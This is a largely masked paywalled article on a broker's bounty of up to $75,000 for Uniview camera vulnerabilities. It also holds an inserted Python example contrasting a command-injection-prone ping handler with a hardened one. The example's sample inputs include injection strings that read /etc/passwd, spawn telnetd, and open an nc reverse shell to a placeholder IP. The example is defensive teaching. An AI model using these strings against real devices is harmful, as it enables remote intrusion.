Bounty Up To $75,000 For Uniview Vulnerabilities Examined
While Axis' bug bounty program pays at most $3,000 per report, one company is offering up to $75,000 for Uniview vulnerabilities, claiming they are in "high demand".
SSD previously disclosed a Uniview vulnerability in 2021, which IPVM recently examined in Uniview CVE-2021-45039 8.9 Vulnerability Analyzed.
In this post, IPVM examines this bounty, whether the price is fair, and who could be paying for it.
*******, ******* *** ****** ******** *** Uniview ***** ******* ** *** ** paying **** ***. ***** **** ******* itself, ******* ******* ********* ***** ** interested, ****** * **** ** ******* device *****.
"Uniview *************** *** ** **** ******"
**** ******** *** **** ******** ************ ****** ***************** "** ** $**,*** ** ******* for *************** ** *******'* ********!"
*** **** ** ***'* ******** ********* ** * ******* ******** ***** * ***** ********** ** Uniview *** ******** ***** ******* *************** are ** ******.
Who **** ***?
*** **** *** *** ******* (** other) *************** ** *******; **** ********* SSD ******** ***** *** *******, ******** a **** ***** ** **********, *******, it *** *** *******.
** ******* *** ******, ** ***** be **** ****** ** ********* **** itself ****** **** ***** ******* * third *****. (******* *** *** ******* to ****'* ******* ******** ******.)
Other ******** **********
***** **** *******, ** ** **** possible * ********* ***** ** ****** SSD.
*** *******, **** ** ** ******* tech ******** ***** ******* ******* *** ******** their *****,****** ** **** "***** ** *** U.S. *** *** ******* ******". ****'************ ** ********* **** ***** *** ******, *** firm ****** **** * *********** ** vulnerabilities ** *** ***** *** ********* from ******.
***** ********* *************** ** ********* *** ****-***** **** day *************** ******** ********* ** ** $*.** *** *** submission; ******** ***** *** ** *** field **** ** **** ** *** program.
SSD ***********
***** *** *** *** ******* ** this *******, ************ ********* ** ****:
** *** ***** ** ******* *************** from ******** *********** *** *** *** vendors ** *** ****, ** **** publish *************** *** ** **** ****** to *** **** * *****, ** make **** ****** ** *****
*******, **** ***** *** ** ****** SSD *** *************** **** *******'*.
*** **** **** "** ******* *** vendor" *** "*** ************* ** *********** disclosed *** *********",*** *** ******** ********** *******.
High ******** ** ****
****' ******* ****** ****** *** ********* $*,*** **** * $*** *******. IPVM's ******* **** ******** *******, ****** it ** "******* ***** ** *** skill *** **** ******", ********** ***** Axis' ****** ** *** ******** ********* enterprise ******** (******* *** ***).
*** *********,****** ****** ********** ********** **** **** ***** **** $100 ** $**,***;********* ****** *************** $**,*** ** $***,***.
Bashis: $**,*** "**********"
****'* ************* **********, ******, ********* $**,*** "reasonable" ******** ** ***** "**** ****** never ***** $**,*** ******* **** **********":
* ***** *** ****** ** **********, considering *** ****** ** **** *** time ******** *********** ***** **** ** invest ** ******** **** ******* ******. Now ***'* **** ** ***** **** the ****** **** **** ****** ***** reach $**,*** ******* **** **********.
** * ******** **********, **** ********* the *** ****** ******* **** *** SSD, ** ** ***** **** ***'* would ** **** ********** *** **** security ***********.
* **** ***** **** *** *** bug ****** ****** ******* *** ****** a ************ ******** * ******** ********** is ** **** ******** ***** ** the ********. *** *** ****** - high ***********, **** *** ****** - low ***********.
*******, ** ** *** ******* **** offers **** *** ******, *** *** SSD ****** ** ** $**,*** ** something **** **** *** ***** ******.
*** ***** ** *** ****, ** an *********** ******** ********** ***** ***** out ** **** ******* ** *** industry, *** *** ****** ***** ***** be * ***, *** ***** * t-shirt ** ****.
Vulns "** ******": ******* *********, **** ******, ******* *********
*** ****** ***'* ******** ***** ******** ***** Uniview *************** *** ** ******:
*** ***** ***** *** ****** ** video ************:
- code/command ********* involves attackers remotely executing commands, i.e., no need for user input, per ***********. **** ** * ****** **** of ***** ************ *************, *.*. ********* ***** *(***** **** *** ******** ****).
- command *********: a command injection is "an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application", according to *** ******** ********* *****.* ********' * *** ************* * ******* ********* ****.
- authentication ****** means pretending to be a legitimate user to gain access. This is also common, e.g. this was how the Verkada Mass Hack happened. * ** ******' * *** ************** ************** ****** *****.
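To make the command injection class concrete, here is an added example (not code from the IPVM article, from SSD, or from any Uniview product) showing the pattern that produces it in an embedded web UI, a "ping" or "traceroute" diagnostic handler that pastes a user-supplied host into a shell string, beside the hardened form that validates the host against an allow-list and passes it as an argv element with no shell. The handler names, the sample inputs and the host grammar are all constructed for illustration.

```python
import re
import shlex
import subprocess

# Constructed sample inputs (not from the article): one benign host and three
# injection attempts of the kind aimed at embedded "network diagnostic" pages.
SAMPLE_INPUTS = [
    "192.0.2.10",
    "192.0.2.10; cat /etc/passwd",
    "192.0.2.10 && telnetd -l /bin/sh",
    "192.0.2.10 | nc 198.51.100.5 4444 -e /bin/sh",
]

# Hypothetical allow-list grammar for a hostname/IPv4 literal: starts and ends
# with an alphanumeric, so the value can never begin with '-' and be parsed as
# a ping flag, and contains no whitespace or shell metacharacters at all.
_HOST_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252}[A-Za-z0-9])?$")


def build_ping_vulnerable(host: str) -> str:
    """Vulnerable pattern: user input concatenated into a shell command line.
    When this string reaches /bin/sh (os.system, subprocess with shell=True),
    anything after ';', '&&', '||' or '|' runs as a second command."""
    return f"ping -c 1 {host}"


def shell_command_count(cmd: str) -> int:
    """Count how many commands /bin/sh would see in cmd, by tokenizing with
    shell punctuation rules. Lets the injection be demonstrated offline
    without executing anything."""
    lexer = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    separators = {";", "&&", "||", "|", "&"}
    return 1 + sum(1 for tok in lexer if tok in separators)


def host_accepted(host: str) -> bool:
    """True if host passes the allow-list grammar above."""
    return _HOST_RE.fullmatch(host) is not None


def build_ping_hardened(host: str) -> list[str]:
    """Hardened pattern: reject anything outside the grammar, then build an
    argv list. With no shell involved, metacharacters have no meaning even if
    the grammar were loosened later."""
    if not host_accepted(host):
        raise ValueError(f"rejected host argument: {host!r}")
    return ["ping", "-c", "1", host]


def run_ping(host: str) -> subprocess.CompletedProcess:
    """Execute the hardened command (never shell=True). Not exercised by the
    demo below so the example stays offline."""
    return subprocess.run(build_ping_hardened(host), capture_output=True,
                          text=True, timeout=5)


def demo() -> dict:
    """Show, for each sample input, how many shell commands the vulnerable
    builder yields and whether the hardened builder accepts it."""
    report = {}
    for value in SAMPLE_INPUTS:
        report[value] = {
            "shell_commands_if_concatenated": shell_command_count(build_ping_vulnerable(value)),
            "accepted_by_hardened_handler": host_accepted(value),
        }
    return report


if __name__ == "__main__":
    for value, result in demo().items():
        print(f"{value!r}: {result}")
```

The point of the hardened version is the combination: the allow-list keeps hostile values out, and the argv list means there is no shell to interpret them if a value slips through, which is the same defence whether the handler is written in Python, PHP or the C CGI binaries typical of camera firmware.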
SSD **********
*** **** ** ************ *** ***** ** *****, ***** Korea.**** *******,** ******* **** ********, **** ** is ********* "******** *** *** ****** Disclosure *******" ** ********.
*** **** ********* ***** ** ********:*** ********* ** ******, *** ******** researchers ** ***** *****, *** *** security ********** ** *******. *******, **** is *** * **** ********* ***** many ******* ** ********* ***** *** anonymous/avoid *********** **********.
*** **** ***** ** ****** ********** in *********** **********;*** ** *** ***** ************** ***** ********** *******:
Vulns ****** *** *********, ********, ***, *********
***'******** ***** ********* *** **** ******** ***** **** numerous ****** ****** **** **** ** mobile ********* (******** *********, ********) *** OS/Browsers (******, *******, *****). *** ***** surveillance, *** ***** *********, ********, *********, and *** ***** **** *******:
- ********* ** *****, *** ** ******* are ********.
- ******** *** *** *** **** ********* but **** ** *******. ******** ** best ***** *** *********** ** ****** **** ** * ***** ****** attack **** ****** ****** ******** ******.
- *********, * ***** ****** ***/***, ** listed.*** ********** ****"** *** ****** ** *** **** interested ** *** & **** ***************" in***** ******** ****** ** *****.
*******, * ******** ***** ** **** named (********) *** *******.
Bounties *** ******
**** ** ******* **** ***** *** other ******** ***** ******* *** ***** video ************ *************, *******, *** **** is *** ** ********* *** ****** offered ***************. **** ****** *** **** is **** * **** ** ******** advertising ****** ***** *******. **** ********** that ***** ************ ********* *** ***** assume **** *** ****** *** ******** trying ** ******* *********** *************** *** their ******** *** ** ******** ** taking ******** ********.
SSD **********, ******* ** ********
**** ********* ******* *** *** ********** for **** *******, ******* ******* *********. If **** **, ** **** ******.
*** *** *********? *** ****** ** money ******* ********** ***** **** ** quite ***** *** ***** *********** ********* plus *** ****** ******** ** *** is ***** ** **** *** ** these ***************. ** ** ****** ** here (**** - * ******* ******** *** Video ************ ******* ********), ***** ** * **** ** the ****** **** **** ******** ************* are *** ***** ** ***** *************** are ********* *** ******.
"* ***** **** ** *** ***** of **** ******* ** ****".
$*
$**
** *** **** ***** *** $ amount, *** **** **** * *** of **** ** *****.
* **** ****** ** **** *** that *** "*** ** **"